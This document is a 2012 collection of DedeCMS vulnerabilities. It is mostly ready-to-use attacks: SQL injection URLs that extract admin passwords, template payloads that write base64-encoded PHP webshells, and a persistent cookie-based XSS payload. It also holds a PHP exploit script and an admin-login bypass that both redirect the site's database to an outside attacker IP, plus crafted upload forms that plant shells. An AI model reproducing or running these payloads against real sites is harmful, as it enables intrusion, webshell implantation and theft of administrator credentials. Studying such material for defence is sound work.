DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 RSS injection vulnerability

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability

Register a member account and upload a piece of software; in the "local address" field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This writes x.php with password xiao, i.e. a one-line webshell is created directly.

DedeCMS 5.6 GBK SQL injection vulnerability

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DedeCMS (all versions) gotopage variable XSS vulnerability

1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS "rootkit" (a persistent cookie-based payload). Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be turned off.

http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser. From then on, no matter how you visit either of the URLs below, our XSS is triggered.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DedeCMS (织梦) variable overwrite getshell

#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.com www.webvul.com
');
echo "\r\n";
if ($argv[2] == null) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];
$aid  = $argv[2];
$path = $argv[3];
$exp  = Getshell($url, $aid, $path);
// Getshell() returns only the HTTP status line; "OK" past offset 12 means "HTTP/1.1 200 OK"
if (strpos($exp, "OK") > 12) {
    echo "\nExploit Success \n";
    if ($aid == 1) echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "\nShell:".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "\nShell:".$url."/$path/plus/fuck.php\n";
} else {
    echo "\nExploit Failed \n";
}

function Getshell($url, $aid, $path)
{
    $id   = $aid;
    $host = $url;
    $port = "80";
    // The POST body overrides the site's database settings through
    // _COOKIE[GLOBALS][cfg_*] request keys (the variable-overwrite bug)
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "\nNo response from ".$host."\n";
        return '';
    }
    fwrite($ock, $data);
    while (!feof($ock)) {
        $exp = fgets($ock, 1024);
        return $exp;   // first line only: the status line
    }
}
?>

DedeCMS v5.6-5.7 privilege bypass vulnerability (direct entry to the admin backend)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site's backend.

The precondition for this vulnerability is that the backend path has to be known.

DedeCMS (织梦) tag remote file write vulnerability

Precondition: you must have your own DedeCMS database ready, then insert this record: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');

Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...

<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

DedeCMS <= V5.6 Final template execution vulnerability

1. Register a user, enter the member backend, publish an article and upload an image. Then, in attachment management, replace the image with a template we have crafted. Say the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if the image format is checked, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet' value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields' value="templet,htmltext;">(constructed here)
</div>
<!-- form action area -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>

Submit; if it reports that the edit succeeded, we have successfully changed the template path.

3. Visit the edited article. Assuming the aid of the article just edited is 2, we only need to request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DedeCMS website management system Get Shell vulnerability (5.3/5.6)

Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

Save this as 1.gif.

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>

Construct the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then construct the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability

http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability

plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

The stored password is the 32-character MD5 with the first 5 characters and the last 7 removed, giving a 20-character MD5; from that, drop 3 more from the front and 1 from the end to get the 16-character MD5.

DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability

<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability

This exploits an error raised by a MySQL field numeric overflow, together with the fact that DedeCMS records database error messages in a PHP file whose header performs no check.

1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.

2. Visit
http://www.abc.com/data/mysql_error_trace.php and seeing the following output proves the injection succeeded:
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Run the file test.html from dede.rar; note that the action address in its form is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the output from step 2 means the file trojan was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*